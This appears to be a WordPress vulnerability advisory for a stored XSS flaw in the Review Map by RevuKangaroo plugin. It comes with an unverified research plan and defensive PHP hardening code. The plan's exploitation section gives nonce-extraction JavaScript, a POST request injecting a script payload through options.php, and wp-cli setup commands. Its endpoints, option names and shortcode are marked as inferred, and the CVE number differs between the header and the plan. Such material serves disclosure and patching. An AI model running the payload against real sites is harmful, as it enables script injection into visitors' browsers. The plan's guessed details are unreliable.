CVE-2026-4161

Review Map by RevuKangaroo <= 1.7 - Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Settings

Severity: Medium
CWE: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Score: 4.4
Patched in: Unpatched
Time to patch: N/A

Description

The Review Map by RevuKangaroo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin settings in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N

Attack Vector: Network
Attack Complexity: High
Privileges Required: High
User Interaction: None
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.7
Published: March 20, 2026
Last updated: March 21, 2026
Research Plan
Unverified


Research Plan: CVE-2024-4161 - Review Map by RevuKangaroo Stored XSS

1. Vulnerability Summary

The Review Map by RevuKangaroo plugin (versions <= 1.7) contains a stored cross-site scripting (XSS) vulnerability. The flaw exists because the plugin fails to sanitize or escape user-supplied input when saving and displaying its settings.

While the vulnerability requires Administrator+ privileges, it is significant in WordPress Multisite environments or installations where the unfiltered_html capability is disabled for administrators (e.g., by the DISALLOW_UNFILTERED_HTML constant). In these contexts, an administrator is restricted from using dangerous HTML, but this plugin provides a bypass by incorrectly handling setting updates.

2. Attack Vector Analysis

  • Vulnerable Endpoint: Plugin settings page, typically located at /wp-admin/admin.php?page=review-map-settings (inferred) or via the WordPress Settings API at /wp-admin/options.php.
  • HTTP Parameter: Specific setting fields (e.g., API keys, map titles, or custom CSS fields) saved in the wp_options table.
  • Authentication: Required (Administrator or Super Admin).
  • Preconditions:
    • Plugin installed and active.
    • unfiltered_html capability must be disabled (standard for non-Super Admins on Multisite).

3. Code Flow (Inferred)

  1. Entry Point: The administrator navigates to the Review Map settings page.
  2. Input: The admin enters a payload (e.g., <script>alert(1)</script>) into a configuration field and submits the form.
  3. Processing: The plugin likely uses register_setting or a custom admin_init hook to process the POST request. It fails to apply sanitize_text_field() or wp_kses() before calling update_option().
  4. Storage: The payload is stored raw in the database (wp_options).
  5. Sink: When the map is rendered (via shortcode on the frontend or on the settings preview), the plugin retrieves the value using get_option() and echoes it directly without using esc_html(), esc_attr(), or wp_kses().
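The save-and-echo pattern described in the code flow above, written out as an added example (not the plugin's own code): the vulnerable registration and shortcode beside their hardened form, plus a mu-plugin filter that forces sanitization on save while the plugin remains unpatched. The option name review_map_api_key, the settings group and the shortcode names are assumptions taken from the inferred values in this plan.

```php
<?php
// Added example, not the plugin's code. Option, group and shortcode names are assumed.
// Vulnerable and hardened forms are shown together only for comparison; a real plugin
// registers the option once.

// --- Vulnerable pattern: no sanitize_callback on save, raw echo on output ---
add_action( 'admin_init', function () {
    // Without a sanitize_callback, options.php -> update_option() stores whatever
    // the admin posted, even when unfiltered_html has been disabled.
    register_setting( 'review_map_settings_group', 'review_map_api_key' );
} );

add_shortcode( 'revukangaroo_map_vuln', function () {
    // The stored value reaches the page unescaped: a <script> saved in the option
    // breaks out of the attribute and runs for every visitor of the page.
    return '<div class="review-map" data-key="' . get_option( 'review_map_api_key' ) . '"></div>';
} );

// --- Hardened pattern: sanitize on save, escape for the output context ---
add_action( 'admin_init', function () {
    register_setting(
        'review_map_settings_group',
        'review_map_api_key',
        array(
            'type'              => 'string',
            // Runs before update_option(); strips tags and control characters.
            // Use wp_kses_post() instead for fields that legitimately hold markup.
            'sanitize_callback' => 'sanitize_text_field',
            'default'           => '',
        )
    );
} );

add_shortcode( 'revukangaroo_map_safe', function () {
    // esc_attr() for attribute values; esc_html() would be the choice for text nodes.
    $key = get_option( 'review_map_api_key', '' );
    return '<div class="review-map" data-key="' . esc_attr( $key ) . '"></div>';
} );

// --- Site-side mitigation while unpatched (drop into wp-content/mu-plugins/) ---
// pre_update_option_{$option} fires on every save regardless of how the plugin
// registered the setting, so the raw payload never reaches wp_options.
add_filter( 'pre_update_option_review_map_api_key', function ( $new_value ) {
    return sanitize_text_field( (string) $new_value );
} );
```

Output escaping cannot be added from outside the plugin, so the mu-plugin filter only closes the storage side; values already stored should still be checked with wp option get and re-saved.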

4. Nonce Acquisition Strategy

The plugin likely uses the WordPress Settings API or a standard admin form with a CSRF nonce.

  1. Identify the Page: Use wp-cli to find the settings page slug:
    wp admin-menu list | grep "Review Map"
  2. Navigate: Use browser_navigate to visit the settings page.
  3. Extract Nonce and Fields: Use browser_eval to inspect the form.
    // Common patterns for Settings API or custom forms
    (() => {
      return {
        nonce: document.querySelector('input[name="_wpnonce"]')?.value,
        action: document.querySelector('form')?.action,
        option_page: document.querySelector('input[name="option_page"]')?.value,
        fields: Array.from(document.querySelectorAll('input[type="text"], textarea')).map(i => i.name)
      };
    })()
    
  4. Note: If the plugin uses options.php, the nonce action is usually ${option_group}-options.

5. Exploitation Strategy

Step 1: Discover Input Fields

Access the settings page and identify which fields are available for modification.

  • URL: /wp-admin/admin.php?page=review-map-settings (inferred)

Step 2: Inject Payload

Perform a POST request to update the settings with the XSS payload.
Note: We assume the plugin uses the standard options.php route.

  • Method: POST
  • URL: http://vulnerable-site.local/wp-admin/options.php
  • Content-Type: application/x-www-form-urlencoded
  • Payload:
    option_page=review_map_settings_group&
    action=update&
    _wpnonce=[EXTRACTED_NONCE]&
    review_map_api_key=<script>alert(document.domain)</script>&
    submit=Save+Settings
    

Step 3: Trigger Execution

Identify where the setting is reflected. This is typically on the frontend where the map is displayed.

  1. Create a post with the plugin's shortcode.
  2. Visit the post as any user.

6. Test Data Setup

  1. Install Plugin: Ensure Review Map by RevuKangaroo <= 1.7 is active.
  2. Restrict Capabilities: Add define( 'DISALLOW_UNFILTERED_HTML', true ); to wp-config.php to simulate the vulnerable environment for the Admin user.
  3. Create Target Page:
    wp post create --post_type=page --post_title="Review Map Page" --post_status=publish --post_content='[revukangaroo_map]' (Shortcode inferred from plugin name).
  4. Create Admin:
    wp user create attacker admin@example.com --role=administrator --user_pass=password

7. Expected Results

  • The settings update should succeed.
  • Navigating to the page containing the shortcode (or returning to the settings page) should trigger a JavaScript alert box, confirming the payload was stored and executed without escaping.

8. Verification Steps

  1. Check Database: Verify the payload is stored raw.
    wp option get review_map_api_key (inferred option name).
  2. Check Frontend Source:
    Use http_request to fetch the frontend page and grep for the raw payload.
    grep "<script>alert(document.domain)</script>" response_body.html

9. Alternative Approaches

If the plugin does not use options.php:

  1. Custom AJAX: Check for wp_ajax_ hooks in the code. If found, use admin-ajax.php with the appropriate action and nonce.
  2. Custom Admin Post: Look for admin_post hooks and send the request to admin-post.php.
  3. Frontend Reflected: If the settings page itself reflects the value immediately after saving, the XSS will trigger in the Admin's own browser first.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Review Map by RevuKangaroo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its settings page in versions up to 1.7. This allows authenticated administrators to inject arbitrary JavaScript because the plugin fails to sanitize input and escape output of configuration fields. This vulnerability primarily affects WordPress Multisite environments or installations where administrators have the 'unfiltered_html' capability disabled.

Exploit Outline

  1. Authenticate as an Administrator or higher on a site where unfiltered_html is restricted (e.g., a WordPress Multisite instance).
  2. Navigate to the Review Map settings page (likely located at /wp-admin/admin.php?page=review-map-settings).
  3. Locate a configuration field, such as an API key or title field, and input a JavaScript payload (e.g., <script>alert(document.domain)</script>).
  4. Submit the settings form to save the payload into the site's options table.
  5. Trigger the payload by visiting the frontend page where the plugin's shortcode ([revukangaroo_map]) is used, or by revisiting the settings page.
